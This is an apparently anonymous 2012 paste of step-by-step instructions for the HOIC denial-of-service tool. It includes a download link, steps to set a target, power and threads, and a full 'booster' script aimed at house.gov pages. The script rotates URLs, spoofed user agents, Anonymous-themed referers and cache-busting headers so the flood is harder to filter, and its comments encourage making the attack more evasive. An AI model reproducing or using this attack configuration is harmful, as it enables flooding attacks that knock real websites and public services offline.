Hoic Instructions


SUBMITTED BY: Guest

DATE: Oct. 10, 2012, 10:51 p.m.

FORMAT: Text only

SIZE: 7.2 kB

HITS: 4512

  1. Hoic Download: http://www.mediafire.com/?zzeshi313vz3h7v
  2. ok now that you have downloaded hoic you need to know how to use it.
  3. when you open hoic youll see a few buttons such as threads with arrows up and down + - and fire.
  4. to give hoic a target hit +
  5. enter the full url of the target such as http://www.example.com/
  6. next choose power, (I always use High)
  7. then pick a booster
  8. NOTE: you need a unique booster for each website. see http://pastebin.com/ye7xR8rJ for instructions on making a booster
  9. say you were going to use a booster for www.example.com you would name it example.hoic and place it in the hoic folder so you can assign it to a target when you hit +
  10. ok so now we have our target http://www.example.com/ with power on high and example.hoic booster
  11. increase your threads to 4 or 5 and hit fire.
  12. and then your done :D
  13. NOTE: if your hoic keeps crashing try lowering the thread count
  14. NOTE: below is an example of a booster
  15. Dim useragents() as String
  16. Dim referers() as String
  17. dim randheaders() as string
  18. Dim randURLs() as string
  19. // populate rotating urls
  20. // IF YOU WANT TO IMPROVE THE ATTACK, ADD URLS BELONGING TO THIS DOMAIN OR RELATED SUBDOMAINS!!! PRO-TIP: You should create anew target and .HOIC file if u want to attack a different organization
  21. randURLs.Append "http://www.house.gov/"
  22. randURLs.Append "http://www.house.gov/representatives/"
  23. randURLs.Append "http://www.house.gov/leadership/"
  24. randURLs.Append "http://www.house.gov/committees/"
  25. randURLs.Append "http://www.house.gov/legislative/"
  26. randURLs.Append "http://www.house.gov/content/learn/"
  27. randURLs.Append "http://www.house.gov/content/learn/branches_of_government/"
  28. randURLs.Append "http://www.house.gov/content/learn/legislative_process/"
  29. randURLs.Append "http://www.house.gov/content/learn/officers_and_organizations/"
  30. randURLs.Append "http://chaplain.house.gov/"
  31. // rotate out url
  32. URL = randURLs(RndNumber(0, randURLs.UBound))
  33. // EDIT THE FOLLOWING STRINGS TO MAKE YOUR OWN BOOST UNIQUE AND THEREFORE MORE EVASIVE!
  34. // populate list
  35. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
  36. useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
  37. useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
  38. useragents.Append "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
  39. useragents.Append "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)"
  40. useragents.Append "Googlebot/2.1 ( http://www.googlebot.com/bot.html) "
  41. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14"
  42. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14"
  43. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13"
  44. useragents.Append "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13"
  45. useragents.Append "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)"
  46. useragents.Append "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
  47. useragents.Append "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
  48. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16"
  49. useragents.Append "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
  50. useragents.Append "Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53"
  51. // populate referer list
  52. referers.Append "http://www.google.com/?q=Sumo+will+not+stop"
  53. referers.Append "http://www.google.com/?q=anonymous+hacker"
  54. referers.Append "http://www.google.com/?q=Open+wifi+to+all"
  55. referers.Append "http://www.google.com/?q=anonymous+cataclysm+leader"
  56. referers.Append URL
  57. randURLs.Append "http://www.house.gov/"
  58. randURLs.Append "http://www.house.gov/representatives/"
  59. randURLs.Append "http://www.house.gov/leadership/"
  60. randURLs.Append "http://www.house.gov/committees/"
  61. randURLs.Append "http://www.house.gov/legislative/"
  62. randURLs.Append "http://www.house.gov/content/learn/"
  63. randURLs.Append "http://www.house.gov/content/learn/branches_of_government/"
  64. randURLs.Append "http://www.house.gov/content/learn/legislative_process/"
  65. randURLs.Append "http://www.house.gov/content/learn/officers_and_organizations/"
  66. randURLs.Append "http://chaplain.house.gov/"
  67. // Add random headers
  68. randheaders.Append "Cache-Control: no-cache"
  69. randheaders.Append "If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT"
  70. randheaders.Append "If-Modified-Since: Tue, 18 Sep 2002 10:34:27 GMT"
  71. randheaders.Append "If-Modified-Since: Mon, 12 Aug 2004 12:54:49 GMT"
  72. randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
  73. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2006 08:49:15 GMT"
  74. randheaders.Append "If-Modified-Since: Fri, 20 Oct 2006 09:34:27 GMT"
  75. randheaders.Append "If-Modified-Since: Mon, 29 Oct 2001 05:17:09 GMT"
  76. randheaders.Append "If-Modified-Since: Tue, 18 Apr 2003 12:54:49 GMT"
  77. randheaders.Append "If-Modified-Since: Sat, 18 Aug 2002 12:54:49 GMT"
  78. randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
  79. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
  80. randheaders.Append "If-Modified-Since: Fri, 20 Jun 2006 09:34:27 GMT"
  81. randheaders.Append "If-Modified-Since: Sun, 13 Oct 2007 11:59:59 GMT"
  82. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMT"
  83. randheaders.Append "If-Modified-Since: Wed, 30 Jan 2002 01:21:09 GMT"
  84. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
  85. randheaders.Append "If-Modified-Since: Fri, 20 Oct 2008 09:34:27 GMT"
  86. randheaders.Append "If-Modified-Since: Mon, 29 Oct 2007 11:59:59 GMT"
  87. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2001 12:54:49 GMT"
  88. Headers.Append "Keep-Alive: 115"
  89. Headers.Append "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"
  90. Headers.Append "Connection: keep-alive"
  91. // ------------------ DO NOT EDIT BELOW THIS LINE
  92. // generate random referer
  93. Headers.Append "Referer: " + referers(RndNumber(0, referers.UBound))
  94. // generate random user agent (DO NOT MODIFY THIS LINE)
  95. Headers.Append "User-Agent: " + useragents(RndNumber(0, useragents.UBound))
  96. // Generate random headers
  97. Headers.Append randheaders(RndNumber(0, randheaders.UBound))

comments powered by Disqus